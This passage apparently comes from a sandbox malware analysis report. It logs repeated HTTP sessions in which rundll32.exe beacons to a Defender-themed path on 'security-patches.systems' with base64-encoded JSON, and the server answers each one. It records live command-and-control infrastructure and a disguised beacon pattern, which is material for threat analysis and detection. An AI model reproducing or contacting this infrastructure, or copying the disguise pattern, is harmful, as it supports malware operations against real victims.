                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.449750185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp   Bytes transferred   Direction   Data
                                              Dec 6, 2024 22:20:21.950834036 CET   461   OUT   POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:23.401829004 CET   218   IN   HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:23 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.449751185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp   Bytes transferred   Direction   Data
                                              Dec 6, 2024 22:20:23.676794052 CET   461   OUT   POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:25.116084099 CET   218   IN   HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:24 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.449752185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp   Bytes transferred   Direction   Data
                                              Dec 6, 2024 22:20:25.373133898 CET   461   OUT   POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:26.924909115 CET   218   IN   HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:26 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.449753185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp   Bytes transferred   Direction   Data
                                              Dec 6, 2024 22:20:27.185223103 CET   461   OUT   POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:28.638133049 CET   218   IN   HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:28 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.449754185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp   Bytes transferred   Direction   Data
                                              Dec 6, 2024 22:20:28.904866934 CET   461   OUT   POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:30.350822926 CET   218   IN   HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:30 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.449755185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp   Bytes transferred   Direction   Data
                                              Dec 6, 2024 22:20:30.621342897 CET   461   OUT   POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:32.059113979 CET   218   IN   HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:31 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.449756185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp   Bytes transferred   Direction   Data
                                              Dec 6, 2024 22:20:32.345726013 CET   461   OUT   POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:33.778940916 CET   218   IN   HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:33 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.449757185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp   Bytes transferred   Direction   Data
                                              Dec 6, 2024 22:20:34.041434050 CET   461   OUT   POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:35.515829086 CET   218   IN   HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:35 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.449760185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp   Bytes transferred   Direction   Data
                                              Dec 6, 2024 22:20:35.777730942 CET   461   OUT   POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:37.388056040 CET  218  IN  HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:36 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.449761185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Dec 6, 2024 22:20:37.654063940 CET  461  OUT  POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:39.109209061 CET  218  IN  HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:38 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.2.449767185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Dec 6, 2024 22:20:39.374171972 CET  461  OUT  POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:40.856287003 CET  218  IN  HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:40 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.2.449773185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Dec 6, 2024 22:20:41.132041931 CET  461  OUT  POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:42.594734907 CET  218  IN  HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:42 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              22192.168.2.449779185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Dec 6, 2024 22:20:42.857764959 CET  461  OUT  POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:44.310071945 CET  218  IN  HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:43 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              23192.168.2.449782185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Dec 6, 2024 22:20:44.597064018 CET  461  OUT  POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:46.058696032 CET  218  IN  HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:45 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              24192.168.2.449787185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Dec 6, 2024 22:20:46.327305079 CET  461  OUT  POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:47.773425102 CET  218  IN  HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:47 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              25192.168.2.449793185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Dec 6, 2024 22:20:48.032160997 CET  461  OUT  POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:49.501842022 CET  218  IN  HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:49 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              26192.168.2.449798185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Dec 6, 2024 22:20:49.910649061 CET  461  OUT  POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:51.372632027 CET  218  IN  HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:51 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              27192.168.2.449804185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Dec 6, 2024 22:20:51.639734983 CET  461  OUT  POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:53.088341951 CET  218  IN  HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:52 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              28192.168.2.449806185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Dec 6, 2024 22:20:53.357587099 CET  461  OUT  POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:54.792453051 CET  218  IN  HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:54 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              29192.168.2.449811185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Dec 6, 2024 22:20:55.070889950 CET  461  OUT  POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
